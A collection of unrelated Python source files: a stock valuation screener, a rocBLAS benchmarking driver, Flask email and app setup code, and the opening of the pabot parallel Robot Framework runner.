timestamp=str(now.strftime("%Y/%m/%d %H:%M:%S"))
PROCESS_STATE[process['processname']] = {'time': timestamp, 'state': short_state, 'from_state': process['from_state'],
'pid':pid}
# transition from READY to ACKNOWLEDGED
write_stdout('RESULT 2\nOK')
httpServer.join()
def kill_child_processes():
procs = psutil.Process().children()
# send SIGTERM
for p in procs:
try:
p.terminate()
except psutil.NoSuchProcess:
pass
def doExit(signalNumber, frame):
write_stderr("Got signal: "+str(signalNumber)+" need to exit ...")
kill_child_processes()
exit(0)
if __name__ == '__main__':
main()
|
stock_evaluator.py
|
import time
from yahoo_fin.stock_info import *
import json
import numpy_financial as npf
import pandas as pd
import numpy
import traceback
import csv
import random
import stopit
from concurrent.futures import ThreadPoolExecutor, as_completed
import logging
import queue
import threading
import socket
import requests
RATE_OF_RETURN = .15
MARGIN_OF_ERROR = .5
POLLING_RETRIES = 4
MAX_THREADS = 20
TIMEOUT = 20
# FIXME make this more mutable
TICKERS_CSV = './tickers.12.8.21.csv'
# TICKERS_CSV = './tickers_small.csv'
print(f'Local IP: {socket.gethostbyname(socket.gethostname())}')
ip = requests.get('https://api.ipify.org').content.decode('utf8')
print('Public IP: {}'.format(ip))
print('Getting tickers')
df = pd.read_csv(TICKERS_CSV).iloc[:,0:2]
ticker_count = len(df)
csvfile = open('outputs/good.csv', 'w')
csvwriter = csv.writer(csvfile)
columns=['ticker', 'current_EPS', 'growth_rate', 'PE', 'future_EPS', 'unadjusted_price', 'present_value', 'calculated_value', 'previous_close', 'good']
csvwriter.writerow(columns)
logging.basicConfig(level=logging.INFO, format='%(asctime)-5s :: %(relativeCreated)-4d :: %(threadName)-10s :: %(levelname)-5s: %(message)s')
filehandler = logging.FileHandler('./outputs/log.csv', mode='w')
log = logging.getLogger('stock-eval')
log.addHandler(filehandler)
log.debug('Tickers:')
log.debug(df)
@stopit.threading_timeoutable(default=('didnt finish', None, None))
def poll_api(ticker):
info = get_analysts_info(ticker)
time.sleep(random.random()*2)
try:
quote = get_quote_table(ticker)
time.sleep(random.random()*2)
except Exception:
log.error(f'{ticker}: something wrong with get_quote_table, cannot process so skipping')
log.error(traceback.format_exc())
        raise
try:
stats = get_stats_valuation(ticker)
time.sleep(random.random()*2)
except IndexError:
log.warning(f'{ticker}: cant get stats table, will try to use data from quote table')
stats = None
return info, stats, quote
def writer(q):
log.info('writer started')
csvfile = open('outputs/good.csv', 'w')
csvwriter = csv.writer(csvfile)
columns=['ticker', 'current_EPS', 'growth_rate', 'PE', 'future_EPS', 'unadjusted_price', 'present_value', 'calculated_value', 'previous_close', 'good']
csvwriter.writerow(columns)
    count = 0
    kill = False
while 1:
m = q.get()
if m == 'kill':
kill = True
log.info('writer killed')
break
csvwriter.writerow(m)
csvfile.flush()
count += 1
if count == ticker_count:
log.info('writer done')
            kill = True
if kill:
csvfile.close()
q.task_done()
def get_info(ticker, name, q):
log.info(f"Getting analysis for ticker {ticker}: {name}")
# try to get data, retry x amount of times
for i in range(POLLING_RETRIES):
try:
info, stats, quote = poll_api(ticker, timeout=TIMEOUT)
if info == 'didnt finish':
log.info(f"{i}: DIDNT FINISH LOADING IN TIME")
# ran out of retries, failed
                if i == POLLING_RETRIES - 1:
return
# retry
continue
except ValueError:
log.info(f"{ticker}: Error getting analyist info, most likely not available")
return
break
if float(info['Earnings Estimate'].iloc[0,3]) == 0:
log.info("No analysts avilable, skipping")
return
else:
log.debug(f"Num analysts: {float(info['Earnings Estimate'].iloc[0,3])}")
data = {}
# col should be "current year"
data['current_EPS'] = float(info['Earnings Estimate'].iloc[1,3])
try:
data['growth_rate'] = float(info['Growth Estimates'].loc[4, ticker].replace('%', ''))/100
except AttributeError:
log.warning("NOTE: can't find 5 year per annum growth rate, will try next year growth rate")
try:
data['growth_rate'] = float(info['Growth Estimates'].loc[3, ticker].replace('%', ''))/100
except AttributeError:
log.warning("NOTE: can't find 5 year per annum growth rate, will try next year growth rate")
data['growth_rate'] = float(info['Growth Estimates'].loc[2, ticker].replace('%', ''))/100
# TODO: add a check to make sure nothing is null and error if so
if stats is not None:
data['PE_trailing'] = float(stats.iloc[2,1])
else:
data['PE_trailing'] = numpy.nan
if numpy.isnan(data['PE_trailing']):
log.warning("NOTE: can't find PE trailing, will just use the growth percentage * 200")
data['PE_trailing'] = data['growth_rate']*200
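    # Valuation steps used below (this script's own assumptions): project EPS ten years out
    # at the analyst growth rate, apply the trailing P/E to get a future price, discount it
    # back at RATE_OF_RETURN (npf.pv with pmt=0 reduces to unadjusted_price / (1 + RATE_OF_RETURN)**10),
    # then require a MARGIN_OF_ERROR haircut before a ticker is flagged as "good".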
data['future_EPS'] = data["current_EPS"]* ((1+data["growth_rate"])**10)
data['unadjusted_price'] = data["future_EPS"]* data["PE_trailing"]
data['present_value'] = npf.pv(RATE_OF_RETURN, 10, 0, -1*data['unadjusted_price'])
data['calc_value'] = data['present_value']*MARGIN_OF_ERROR
data['previous_close'] = quote['Previous Close']
good = False
if(data['previous_close'] < data['calc_value']) and data['calc_value'] > 0:
log.info("THIS IS A GOOD ONE!!!!!")
good = True
# csvwriter.writerow([ticker, data['current_EPS'], data['growth_rate'], data['PE_trailing'], data['future_EPS'], data['unadjusted_price'], data['present_value'], data['calc_value'], data['previous_close'], True])
res = [ticker, data['current_EPS'], data['growth_rate'], data['PE_trailing'], data['future_EPS'], data['unadjusted_price'], data['present_value'], data['calc_value'], data['previous_close'], good]
log.info(res)
q.put(res)
log.info("the data I used:")
log.info(json.dumps(data, indent=4))
def lambda_function(event, context):
# start the writer thread
t_start = time.time()
q = queue.Queue()
    q_thread = threading.Thread(target=writer, args=(q,), daemon=True)
    q_thread.start()
executer = ThreadPoolExecutor(max_workers=MAX_THREADS, thread_name_prefix='tkr_')
log.info(f"TICKER COUNT: {ticker_count}")
# print(f"{df.iloc[i,0]} {df.iloc[i,1]}")
futures_to_ticker = {executer.submit(get_info, df.iloc[i,0], df.iloc[i,1], q, ): df.iloc[i,0] for i in range(ticker_count)}
doneCount = 0
for future in as_completed(futures_to_ticker):
log.info(f'future {futures_to_ticker[future]} completed {doneCount + 1}/{ticker_count}')
doneCount += 1
if doneCount == ticker_count:
executer.shutdown(wait=True)
log.info('executer shutdown complete')
q.put('kill')
t_end = time.time()
log.info(f"okay, i think everything's done :) completed in {t_end-t_start}ms")
if __name__ == '__main__':
lambda_function(None, None)
|
measurePerformance.py
|
# ########################################################################
# Copyright 2016 Advanced Micro Devices, Inc.
#
# ########################################################################
import sys
import argparse
import subprocess
import itertools
import re  # regex
import os
from threading import Timer, Thread
import thread, time
from platform import system
from datetime import datetime
import errorHandler
from blasPerformanceTesting import *
from performanceUtility import timeout, log
IAM = 'BLAS'
TIMOUT_VAL = 900 #In seconds
"""
define and parse parameters
"""
devicevalues = ['gpu', 'cpu']
libraryvalues = ['rocblas','acmlblas']
transvalues = ['none','transpose','conj']
sidevalues = ['left','right']
uplovalues = ['upper','lower']
diagvalues = ['unit','nonunit']
functionvalues = ['gemm', 'trmm', 'trsm', 'trsv', 'syrk', 'syr2k', 'gemv', 'symv', 'symm', 'hemm', 'herk', 'her2k' ]
precisionvalues = ['s', 'd', 'c', 'z']
roundtripvalues = ['roundtrip','noroundtrip','both']
memallocvalues = ['default','alloc_host_ptr','use_host_ptr','copy_host_ptr','use_persistent_mem_amd']
parser = argparse.ArgumentParser(description='Measure performance of the rocblas library')
parser.add_argument('--device',
dest='device', default='gpu',
help='device(s) to run on; may be a comma-delimited list. choices are ' + str(devicevalues) + '. (default gpu)')
parser.add_argument('-m', '--sizem',
dest='sizem', default=None,
help='size(s) of m to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('-n', '--sizen',
dest='sizen', default=None,
help='size(s) of n to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('-k', '--sizek',
dest='sizek', default=None,
help='size(s) of k to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('-s', '--square',
dest='square', default=None,
help='size(s) of m=n=k to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. this option sets lda = ldb = ldc to the values indicated with --lda for all problems set with --square. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('--problemsize',
dest='problemsize', default=None,
help='additional problems of a set size. may be used in addition to sizem/n/k and lda/b/c. each indicated problem size will be added to the list of problems to complete. should be entered in MxNxK:AxBxC format (where :AxBxC specifies lda/b/c. :AxBxC is optional. if included, lda/b/c are subject to the same range restrictions as indicated in the lda/b/c section of this help. if omitted, :0x0x0 is assumed). may enter multiple in a comma-delimited list. e.g., 2x2x2:4x6x9,3x3x3 or 1024x800x333')
parser.add_argument('--lda',
dest='lda', default=0,
help='value of lda; may include ranges and comma-delimited lists. stepping may be indicated with a colon. if transA = \'n\', lda must be >= \'m\'. otherwise, lda must be >= \'k\'. if this is violated, the problem will be skipped. if lda is 0, it will be automatically set to match either \'m\' (if transA = \'n\') or \'k\' (otherwise). may indicate relative size with +X, where X is the offset relative to M or K (depending on transA). e.g., 1024 or 100-800:100 or 15,2048-3000 or +10 (if transA = \'n\' and M = 100, lda = 110) (default 0)')
parser.add_argument('--ldb',
dest='ldb', default=0,
help='value of ldb; may include ranges and comma-delimited lists. stepping may be indicated with a colon. if transB = \'n\', ldb must be >= \'k\'. otherwise, ldb must be >= \'n\'. if this is violated, the problem will be skipped. if ldb is 0, it will be automatically set to match either \'k\' (if transB = \'n\') or \'n\' (otherwise). may indicate relative size with +X, where X is the offset relative to K or N (depending on transB). e.g., 1024 or 100-800:100 or 15,2048-3000 or +100 (if transB = \'n\' and K = 2000, ldb = 2100) (default 0)')
parser.add_argument('--ldc',
dest='ldc', default=0,
help='value of ldc; may include ranges and comma-delimited lists. stepping may be indicated with a colon. ldc must be >= \'m\'. if this is violated, the problem will be skipped. if ldc is 0, it will be automatically set to match \'m\'. may indicate relative size with +X, where X is the offset relative to M. e.g., 1024 or 100-800:100 or 15,2048-3000 or +5 (if M = 15, ldc = 20) (default 0)')
parser.add_argument('--offa',
dest='offa', default=0,
help='offset of the matrix A in memory; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 0-31 or 100-128:2 or 42 (default 0)')
parser.add_argument('--offb',
dest='offb', default=0,
help='offset of the matrix B or vector X in memory; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 0-31 or 100-128:2 or 42 (default 0)')
parser.add_argument('--offc',
dest='offc', default=0,
help='offset of the matrix C or vector Y in memory; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 0-31 or 100-128:2 or 42 (default 0)')
parser.add_argument('-a', '--alpha',
dest='alpha', default=1.0, type=float,
help='specifies the scalar alpha')
parser.add_argument('-b', '--beta',
dest='beta', default=1.0, type=float,
help='specifies the scalar beta')
parser.add_argument('-f', '--function',
dest='function', default='gemm',
help='indicates the function(s) to use. may be a comma delimited list. choices are ' + str(functionvalues) + ' (default gemm)')
parser.add_argument('-r', '--precision',
dest='precision', default='s',
help='specifies the precision for the function. may be a comma delimited list. choices are ' + str(precisionvalues) + ' (default s)')
parser.add_argument('--transa',
dest='transa', default='none',
help='select none, transpose, or conjugate transpose for matrix A. may be a comma delimited list. choices are ' + str(transvalues) + ' (default none)')
parser.add_argument('--transb',
dest='transb', default='none',
help='select none, transpose, or conjugate transpose for matrix B. may be a comma delimited list. choices are ' + str(transvalues) + ' (default none)')
parser.add_argument('--side',
dest='side', default='left',
help='select side, left or right for TRMM and TRSM. may be a comma delimited list. choices are ' + str(sidevalues) + ' (default left)')
parser.add_argument('--uplo',
dest='uplo', default='upper',
help='select uplo, upper or lower triangle. may be a comma delimited list. choices are ' + str(uplovalues) + ' (default upper)')
parser.add_argument('--diag',
dest='diag', default='unit',
help='select diag, whether set diagonal elements to one. may be a comma delimited list. choices are ' + str(diagvalues) + ' (default unit)')
parser.add_argument('--library',
dest='library', default='rocblas',
help='indicates the library to use. choices are ' + str(libraryvalues) + ' (default rocblas)')
parser.add_argument('--label',
dest='label', default=None,
help='a label to be associated with all transforms performed in this run. if LABEL includes any spaces, it must be in \"double quotes\". note that the label is not saved to an .ini file. e.g., --label cayman may indicate that a test was performed on a cayman card or --label \"Windows 32\" may indicate that the test was performed on Windows 32')
parser.add_argument('--tablefile',
dest='tableOutputFilename', default=None,
help='save the results to a plaintext table with the file name indicated. this can be used with rocblas.plotPerformance.py to generate graphs of the data (default: table prints to screen)')
parser.add_argument('--roundtrip',
dest='roundtrip', default='noroundtrip',
help='whether measure the roundtrips or not. choices are ' + str(roundtripvalues) + '. (default noroundtrip); should not be specified when calling ACML')
parser.add_argument('--memalloc',
dest='memalloc', default='default',
help='set the flags for OpenCL memory allocation. Choices are ' + str(memallocvalues) + '. (default is default); do not need to set when calling ACML or if roundtrip is not set')
ini_group = parser.add_mutually_exclusive_group()
ini_group.add_argument('--createini',
dest='createIniFilename', default=None, type=argparse.FileType('w'),
help='create an .ini file with the given name that saves the other parameters given at the command line, then quit. e.g., \'rocblas.measurePerformance.py -m 10 -n 100 -k 1000-1010 -f sgemm --createini my_favorite_setup.ini\' will create an .ini file that will save the configuration for an sgemm of the indicated sizes.')
ini_group.add_argument('--ini',
dest='useIniFilename', default=None, type=argparse.FileType('r'),
help='use the parameters in the named .ini file instead of the command line parameters.')
args = parser.parse_args()
label = str(args.label)
roundtrip = str(args.roundtrip)
library = str(args.library)
memalloc = str(args.memalloc)
subprocess.call('mkdir perfLog', shell = True)
logfile = os.path.join('perfLog', (label+'-'+'blasMeasurePerfLog.txt'))
def printLog(txt):
print txt
log(logfile, txt)
printLog("=========================MEASURE PERFORMANCE START===========================")
printLog("Process id of Measure Performance:"+str(os.getpid()))
#This function is defunct now
@timeout(5, "fileName") # timeout is 15 minutes, 15*60 = 300 secs
def checkTimeOutPut2(args):
global currCommandProcess
#ret = subprocess.check_output(args, stderr=subprocess.STDOUT)
#return ret
currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
printLog("Curr Command Process id = "+str(currCommandProcess.pid))
ret = currCommandProcess.communicate()
if(ret[0] == None or ret[0] == ''):
errCode = currCommandProcess.poll()
raise subprocess.CalledProcessError(errCode, args, output=ret[1])
return ret[0]
#Spawns a separate thread to execute the library command and wait for that thread to complete
#This wait is of 900 seconds (15 minutes). If still the thread is alive then we kill the thread
def checkTimeOutPut(args):
t = None
global currCommandProcess
global stde
global stdo
stde = None
stdo = None
def executeCommand():
global currCommandProcess
global stdo
global stde
try:
stdo, stde = currCommandProcess.communicate()
printLog('stdout:\n'+str(stdo))
printLog('stderr:\n'+str(stde))
except:
printLog("ERROR: UNKNOWN Exception - +checkWinTimeOutPut()::executeCommand()")
currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
thread = Thread(target=executeCommand)
thread.start()
thread.join(TIMOUT_VAL) #wait for the thread to complete
if thread.is_alive():
printLog('ERROR: Killing the process - terminating thread because it is taking too much of time to execute')
currCommandProcess.kill()
printLog('ERROR: Timed out exception')
raise errorHandler.ApplicationException(__file__, errorHandler.TIME_OUT)
if stdo == "" or stdo==None:
errCode = currCommandProcess.poll()
printLog('ERROR: @@@@@Raising Called processor exception')
raise subprocess.CalledProcessError(errCode, args, output=stde)
return stdo
printLog('Executing measure performance for label: '+str(label))
create_ini_file_if_requested(args)
args = load_ini_file_if_requested(args, parser)
args = split_up_comma_delimited_lists(args)
"""
check parameters for sanity
"""
if args.sizem.count(None) == 0 and (args.sizen.count(None) or args.sizek.count(None)):
printLog( 'ERROR: if any of m, n, or k are specified, all of m, n, and k must be specified')
quit()
if args.sizen.count(None) == 0 and (args.sizem.count(None) or args.sizek.count(None)):
printLog( 'ERROR: if any of m, n, or k are specified, all of m, n, and k must be specified')
quit()
if args.sizek.count(None) == 0 and (args.sizem.count(None) or args.sizen.count(None)):
printLog( 'ERROR: if any of m, n, or k are specified, all of m, n, and k must be specified')
quit()
if args.square.count(None) and args.problemsize.count(None) and args.sizem.count(None) and args.sizen.count(None) and args.sizek.count(None):
printLog( 'ERROR: at least one of [--square] or [--problemsize] or [-m, -n, and -k] must be specified')
quit()
args.sizem = expand_range(args.sizem)
args.sizen = expand_range(args.sizen)
args.sizek = expand_range(args.sizek)
args.square = expand_range(args.square)
args.lda = expand_range(args.lda)
args.ldb = expand_range(args.ldb)
args.ldc = expand_range(args.ldc)
args.offa = expand_range(args.offa)
args.offb = expand_range(args.offb)
args.offc = expand_range(args.offc)
args.problemsize = decode_parameter_problemsize(args.problemsize)
"""
create the problem size combinations for each run of the client
"""
if not args.sizem.count(None):
# we only need to do make combinations of problem sizes if m,n,k have been specified explicitly
problem_size_combinations = itertools.product(args.sizem, args.sizen, args.sizek,
args.lda, args.ldb, args.ldc)
problem_size_combinations = list(itertools.islice(problem_size_combinations, None))
else:
problem_size_combinations = []
"""
add manually entered problem sizes to the list of problems to crank out
"""
manual_test_combinations = []
if not args.problemsize.count(None):
for n in args.problemsize:
sizem = []
sizen = []
sizek = []
lda = []
ldb = []
ldc = []
sizem.append(int(n[0][0]))
sizen.append(int(n[0][1]))
sizek.append(int(n[0][2]))
if len(n) > 1:
lda.append(int(n[1][0]))
ldb.append(int(n[1][1]))
ldc.append(int(n[1][2]))
else:
lda.append(0)
ldb.append(0)
ldc.append(0)
combos = itertools.product(sizem,sizen,sizek,lda,ldb,ldc)
combos = list(itertools.islice(combos, None))
for n in combos:
manual_test_combinations.append(n)
"""
add square problem sizes to the list of problems to crank out
"""
square_test_combinations = []
if not args.square.count(None):
for n in args.square:
combos = itertools.product([n],[n],[n],args.lda) # only lda is considered with --square, and lda/b/c are all set to the values specified by lda
combos = list(itertools.islice(combos, None))
for n in combos:
square_test_combinations.append((n[0],n[1],n[2],n[3],n[3],n[3])) # set lda/b/c = lda
problem_size_combinations = problem_size_combinations + manual_test_combinations + square_test_combinations
"""
create final list of all transformations (with problem sizes and transform properties)
"""
test_combinations = itertools.product(problem_size_combinations, args.offa, args.offb, args.offc, args.alpha, args.beta, args.transa, args.transb, args.side, args.uplo, args.diag, args.function, args.precision, args.device, args.library)
test_combinations = list(itertools.islice(test_combinations, None))
test_combinations = [BlasTestCombination(params[0][0], params[0][1], params[0][2], params[0][3], params[0][4], params[0][5], params[1], params[2], params[3], params[4], params[5], params[6], params[7], params[8], params[9], params[10], params[11], params[12], params[13], params[14], label) for params in test_combinations]
"""
open output file and write the header
"""
table = open_file(args.tableOutputFilename)
table.write(blas_table_header() + '\n')
table.flush()
"""
turn each test combination into a command, run the command, and then stash the gflops
"""
result = [] # this is where we'll store the results for the table
printLog( 'Total combinations = '+str(len(test_combinations)))
vi = 0
#test_combinations = test_combinations[:5]
for params in test_combinations:
vi = vi+1
printLog('preparing command: '+ str(vi))
device = params.device
sizem = params.sizem
sizen = params.sizen
sizek = params.sizek
lda = params.lda
ldb = params.ldb
ldc = params.ldc
offa = params.offa
offb = params.offb
offc = params.offc
alpha = params.alpha
beta = params.beta
function = params.function
precision = params.precision
library = params.library
label = params.label
if params.side == 'left':
side = 'L'
elif params.side == 'right':
side = 'R'
else:
printLog( 'ERROR: unknown value for side')
quit()
if params.uplo == 'upper':
uplo = 'U'
elif params.uplo == 'lower':
uplo = 'L'
else:
printLog( 'ERROR: unknown value for uplo')
quit()
if params.diag == 'unit':
diag = 'U'
elif params.diag == 'nonunit':
diag = 'N'
else:
printLog( 'ERROR: unknown value for diag')
quit()
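    # leading dimensions given as "+X" are relative offsets: resolve lda against m or k
    # (depending on transa), ldb against k or n (depending on transb), and ldc against m,
    # as described in the --lda/--ldb/--ldc help text above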
if re.search('^\+\d+$', lda):
if params.transa == 'none':
lda = str(int(lda.lstrip('+')) + int(sizem))
else:
lda = str(int(lda.lstrip('+')) + int(sizek))
if re.search('^\+\d+$', ldb):
if params.transb == 'none':
ldb = str(int(ldb.lstrip('+')) + int(sizek))
else:
ldb = str(int(ldb.lstrip('+')) + int(sizen))
if re.search('^\+\d+$', ldc):
ldc = str(int(ldc.lstrip('+')) + int(sizem))
if params.transa == 'none':
transa = 'N'
elif params.transa == 'transpose':
transa = 'T'
elif params.transa == 'conj':
transa = 'C'
else:
printLog( 'ERROR: unknown value for transa')
if params.transb == 'none':
transb = 'N'
elif params.transb == 'transpose':
transb = 'T'
elif params.transb == 'conj':
transb = 'C'
else:
printLog( 'ERROR: unknown value for transb')
if library == 'acmlblas':
arguments = [executable(library),
'-m', sizem,
'-n', sizen,
'-k', sizek,
'--lda', lda,
'--ldb', ldb,
'--ldc', ldc,
'--alpha', alpha,
'--beta', beta,
'--transposeA', transa,
'--transposeB', transb,
'--side', side,
'--uplo', uplo,
'--diag', diag,
'--function', function,
'--precision', precision,
'-p', '10',
'--roundtrip', roundtrip]
elif library == 'rocblas':
arguments = [executable(library),
'-m', sizem,
'-n', sizen,
'-k', sizek,
'--lda', lda,
'--ldb', ldb,
'--ldc', ldc,
'--alpha', alpha,
'--beta', beta,
'--transposeA', transa,
'--transposeB', transb,
'--side', side,
'--uplo', uplo,
'--diag', diag,
'--function', function,
'--precision', precision]
else:
printLog( 'ERROR: unknown library:"' +library+ '" can\'t assemble command')
quit()
writeline = True
try:
printLog('Executing Command: '+str(arguments))
        output = checkTimeOutPut(arguments)
        output = output.split(os.linesep)
        printLog('Execution Successful---------------\n')
except errorHandler.ApplicationException as ae:
writeline = False
#Killing the process
#if system() != 'Windows':
# currCommandProcess.kill()
# printLog('ERROR: Killed process')
printLog('ERROR: Command is taking too much of time-- '+ae.message+'\n'+'Command: \n'+str(arguments))
except subprocess.CalledProcessError as clientCrash:
if clientCrash.output.count('bad_alloc'):
writeline = False
printLog( 'Omitting line from table - problem is too large')
elif clientCrash.output.count('CL_INVALID_BUFFER_SIZE'):
writeline = False
printLog( 'Omitting line from table - problem is too large')
elif clientCrash.output.count('CL_INVALID_WORK_GROUP_SIZE'):
writeline = False
printLog( 'Omitting line from table - workgroup size is invalid')
elif clientCrash.output.count('lda must be set to 0 or a value >='):
writeline = False
printLog( 'Omitting line from table - lda is too small')
elif clientCrash.output.count('ldb must be set to 0 or a value >='):
writeline = False
printLog( 'Omitting line from table - ldb is too small')
elif clientCrash.output.count('ldc must be set to 0 or a value >='):
writeline = False
printLog( 'Omitting line from table - ldc is too small')
else:
writeline = False
printLog('ERROR: client crash.\n')
printLog(str(clientCrash.output))
printLog( str(clientCrash))
printLog('In original code we quit here - 1')
continue
#quit()
if writeline:
gflopsoutput = itertools.ifilter( lambda x: x.count('Gflops'), output)
gflopsoutput = list(itertools.islice(gflopsoutput, None))
thisResult = re.search('\d+\.*\d*e*-*\d*$', gflopsoutput[0])
if thisResult != None:
thisResult = float(thisResult.group(0))
thisResult = (params.sizem,
params.sizen,
params.sizek,
params.lda,
params.ldb,
params.ldc,
params.offa,
params.offb,
params.offc,
params.alpha,
params.beta,
params.transa,
params.transb,
params.side,
params.uplo,
params.diag,
params.precision + params.function,
params.device,
params.library,
params.label,
thisResult)
outputRow = ''
for x in thisResult:
outputRow = outputRow + str(x) + ','
outputRow = outputRow.rstrip(',')
table.write(outputRow + '\n')
table.flush()
else:
            if 'nan' in gflopsoutput[0] or 'inf' in gflopsoutput[0]:
printLog( 'WARNING: output from client was funky for this run. skipping table row')
else:
                printLog('ERROR: output from client makes no sense')
                printLog(str(gflopsoutput[0]))
printLog('In original code we quit here - 2')
continue
#quit()
printLog("=========================MEASURE PERFORMANCE ENDS===========================\n")
|
email.py
|
# -*- coding: utf-8 -*-
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from .extensions import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
app.py
|
from flask import Flask, request, jsonify
import logging
import sys
import threading
from web import util
from web.api import timeseries
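# Sanity check: when Python runs with -O the assert below is stripped, nothing raises and
# sys.exit() fires. The API relies on AssertionError for request validation (see
# handle_assertion), so the app refuses to start if asserts are disabled.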
try:
assert False
sys.exit('ERROR asserts disabled, exiting')
except AssertionError:
pass
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
app = Flask(__name__)
# Register endpoints
app.register_blueprint(timeseries.bp)
UPLOAD_FOLDER = '/grid_data'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
threading.Thread(target=lambda: util.every(5, util.remove_download_files, app)).start()
@app.route("/public/hc")
def public_hc():
return "OK", 200
@app.errorhandler(AssertionError)
def handle_assertion(error):
ret = {'code': 400, 'error': error.args[0]}
    app.logger.warning('ERR {code} {error}'.format(**ret),
                       extra={'event': 'error', 'error': ret['error']})
print('ERR {code} {error}'.format(**ret))
return jsonify(**ret), ret['code']
@app.after_request
def log_request(response):
if not request.path == '/public/hc':
ret = {'status': response.status_code, 'request_method': request.method, 'request_uri': request.url}
app.logger.info("{status} {request_method} {request_uri}".format(**ret), extra=ret)
print("{status} {request_method} {request_uri}".format(**ret))
return response
|
pabot.py
|
#!/usr/bin/env python
# Copyright 2014->future! Mikko Korpela
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# partly based on work by Nokia Solutions and Networks Oyj
"""A parallel executor for Robot Framework test cases.
Version 1.10.0
Supports all Robot Framework command line options and also the following
options (these must be before normal RF options):
--verbose
more output
--command [ACTUAL COMMANDS TO START ROBOT EXECUTOR] --end-command
RF script for situations where pybot is not used directly
--processes [NUMBER OF PROCESSES]
How many parallel executors to use (default max of 2 and cpu count)
--testlevelsplit
Split execution on test level instead of default suite level.
If .pabotsuitenames contains both tests and suites then this
will only affect new suites and split only them.
Leaving this flag out when both suites and tests in
.pabotsuitenames file will also only affect new suites and
add them as suite files.
--resourcefile [FILEPATH]
Indicator for a file that can contain shared variables for
distributing resources.
--pabotlib
Start PabotLib remote server. This enables locking and resource
distribution between parallel test executions.
--pabotlibhost [HOSTNAME]
Host name of the PabotLib remote server (default is 127.0.0.1)
--pabotlibport [PORT]
Port number of the PabotLib remote server (default is 8270)
--ordering [FILE PATH]
Optionally give execution order from a file.
--suitesfrom [FILEPATH TO OUTPUTXML]
Optionally read suites from output.xml file. Failed suites will run
first and longer running ones will be executed before shorter ones.
--argumentfile[INTEGER] [FILEPATH]
Run same suite with multiple argumentfile options.
For example "--argumentfile1 arg1.txt --argumentfile2 arg2.txt".
Copyright 2019 Mikko Korpela - Apache 2 License
"""
from __future__ import absolute_import, print_function
import os
import hashlib
import re
import sys
import time
import datetime
import uuid
import random
import traceback
from glob import glob
from io import BytesIO, StringIO
from collections import namedtuple
import shutil
import subprocess
import threading
from robot import rebot
from robot import __version__ as ROBOT_VERSION
from robot.api import ExecutionResult
from robot.conf import RobotSettings
from robot.errors import Information, DataError
from robot.model import ModelModifier
from robot.result.visitor import ResultVisitor
from robot.running import TestSuiteBuilder
from robot.libraries.Remote import Remote
from multiprocessing.pool import ThreadPool
from robot.run import USAGE
from robot.utils import ArgumentParser, SYSTEM_ENCODING, is_unicode, PY2
import signal
from . import pabotlib
from .result_merger import merge
from .clientwrapper import make_order
from .arguments import parse_args, parse_execution_item_line
from .execution_items import (
ExecutionItem,
HivedItem,
GroupItem,
SuiteItem,
TestItem,
DynamicSuiteItem,
GroupStartItem,
GroupEndItem,
SuiteItems,
)
try:
import queue # type: ignore
except ImportError:
import Queue as queue # type: ignore
try:
from shlex import quote # type: ignore
except ImportError:
from pipes import quote # type: ignore
from typing import List, Optional, Union, Dict, Tuple, IO, Any
CTRL_C_PRESSED = False
MESSAGE_QUEUE = queue.Queue()
EXECUTION_POOL_IDS = [] # type: List[int]
EXECUTION_POOL_ID_LOCK = threading.Lock()
POPEN_LOCK = threading.Lock()
_PABOTLIBURI = "127.0.0.1:8270"
_PABOTLIBPROCESS = None # type: Optional[subprocess.Popen]
_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE = (
"!#$^&*?[(){}<>~;'`\\|= \t\n" # does not contain '"'
)
_BAD_CHARS_SET = set(_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
_ABNORMAL_EXIT_HAPPENED = False
_COMPLETED_LOCK = threading.Lock()
_NOT_COMPLETED_INDEXES = [] # type: List[int]
_ROBOT_EXTENSIONS = [
".html",
".htm",
".xhtml",
".tsv",
".rst",
".rest",
".txt",
".robot",
]
_ALL_ELAPSED = [] # type: List[Union[int, float]]
class Color:
SUPPORTED_OSES = ["posix"]
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"
YELLOW = "\033[93m"
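# Commands are later joined with " ".join(...) and executed with shell=True (see _run),
# so arguments containing shell metacharacters must be quoted here.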
def _mapOptionalQuote(command_args):
# type: (List[str]) -> List[str]
if os.name == "posix":
return [quote(arg) for arg in command_args]
return [
arg if set(arg).isdisjoint(_BAD_CHARS_SET) else '"%s"' % arg
for arg in command_args
]
def execute_and_wait_with(item):
# type: ('QueueItem') -> None
global CTRL_C_PRESSED, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
